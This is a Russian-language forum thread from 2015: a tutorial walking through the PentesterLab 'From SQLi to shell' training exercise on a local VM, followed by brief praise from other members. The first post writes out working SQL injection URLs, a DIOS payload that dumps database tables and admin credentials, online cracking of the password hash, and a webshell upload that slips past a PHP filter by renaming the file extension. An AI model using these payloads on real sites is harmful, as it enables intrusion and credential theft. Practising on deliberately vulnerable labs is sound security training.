HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.05.2015, 22:07
Mister_Bert0ni
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
Провел на форуме:
35015

Репутация: 57
По умолчанию

Тем кто в теме врятли что то новое увидет здесь.Поэтому гамнокритика мне не нужна в коментах.Хотите срать - срите в отведенных для этого местах.

И так сегодня наша тема "От SQL иньекции до WebShell-а"

Будем учиться на тренировачной площадке - я скачал ее с

Код:
https://pentesterlab.com/exercises/from_sqli_to_shell
Для видео ее будет достотачно.

И так начнем.

Первое что нам нужно найти уязвимый параметр.В нашем случае это параметр id.

Код:
http://192.168.8.131/cat.php?id=1'
Теперь пробуем сбалансировать запрос:

Код:
http://192.168.8.131/cat.php?id=1-- -
Ищем количество столбцов:

Находим:

Код:
http://192.168.8.131/cat.php?id=1 order by 4-- -
Ищем уязвимые столбцы:

Код:
http://192.168.8.131/cat.php?id=.1 union select 1,2,3,4 -- -
Проверимь базу,версию,

Код:
http://192.168.8.131/cat.php?id=.1 union select 1,concat(database(),0x20,version()),3,4-- -
Ищем админку:

Нашли

Код:
http://192.168.8.131/admin
Будем пробовать получить доступ к админке...

Пробуем разкрутить скуль и получить login pass админа.

Для экономии времени я буду юзать DIOS (Dump In One Shot) c помощью которого можно быстро получить список всех таблиц в один запрос:

Код:
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3a,table_schema,0x3c6c693e,table_name,column_name)),@)
И так наш запрос будет следующим:

Код:
http://192.168.8.131/cat.php?id=.1 union select 1,concat(make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3a,table_schema,0x3c6c693e,table_name,column_name)),@)),3,4-- -
Ищем таблицу с юзерами...

таблица: users , колонки: login и password

получим даные с этих столбцов:

Код:
http://192.168.8.131/cat.php?id=.1 union select 1,concat(make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3a,login,0x203a3a3a20,password)),@)),3,4-- -
Получили логин:admin и пароль в хэше:8efe310f9ab3efeae8d410a8e0166eb2

Первым делом идем на первый онлайн сервис по расшифровки хэша:

В моем случае это:

Код:
http://hashkiller.co.uk/md5-decrypter.aspx
пробуем расшифровать наш хэш:

Нам повезло)) Пароль расшифрован)

Пароль4ssw0rd

Итак идем в админку.

Зашли и ищем там страницу для загрузки контента(картники,новости, узыку и т.д...)

Код:
http://192.168.8.131/admin/new.php
ПРобуем загрузить наш шелл...

Говорит NO PHP! (((

Ну ничего,есть много способов обхода этого фильтра.Сейчас я о них рассказивать не буду - для этого я поже сниму отдельное видео по этой теме..

Для обхода этого фильтра в нашей ситуации достаточно переименовать наш shell.php в shell.php3 или shell.php4 или shell.php5

И так пробуем:

Ура мы залились)

Всем спасибо )) С вами был Mister_Bert0ni)
 
Ответить с цитированием

  #2  
Старый 28.05.2015, 22:20
Cthulchu
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме:
4468361

Репутация: 1549


По умолчанию

очень мило, хороший мануал. Хороший не потому, что ново, а потому, что практика. Практика - большая проблема для новичков. Огромная. Таким образом, выживают только те, кому не жаль времени на бесконечный поиск жертв под определенные уязвимости без дорков.

А тут - на тебе, бесплатный полигон на локалхосте. И не надо думать о логах.

А эта тренировочная площадка - это типа сайтик с заведомо известными уязвимостями? ставится на вамп? Чего это у тебя там восьмая подсеть на локалхосте?

В общем, мне кажется, статью стоит дополнить (может, накидать других вариантов по тренировке на локалхосте) и можно в избранное постить.

.SpoilerTarget" type="button">Spoiler: оффтоп
ЗЫ

хыхы


ну вы поняли.
 
Ответить с цитированием

  #3  
Старый 28.05.2015, 22:26
Mister_Bert0ni
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
Провел на форуме:
35015

Репутация: 57
По умолчанию

Спасибо за одобрение)

Буду стараться еще подобные посты делать.
 
Ответить с цитированием

  #4  
Старый 31.05.2015, 03:38
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]https[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.pentesterlab.com/exercises/[/COLOR][/COLOR] 
Он в целом классный рессурс. Именно та я 'пощупал' shellshock . К сожалению в реальных условиях нет
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.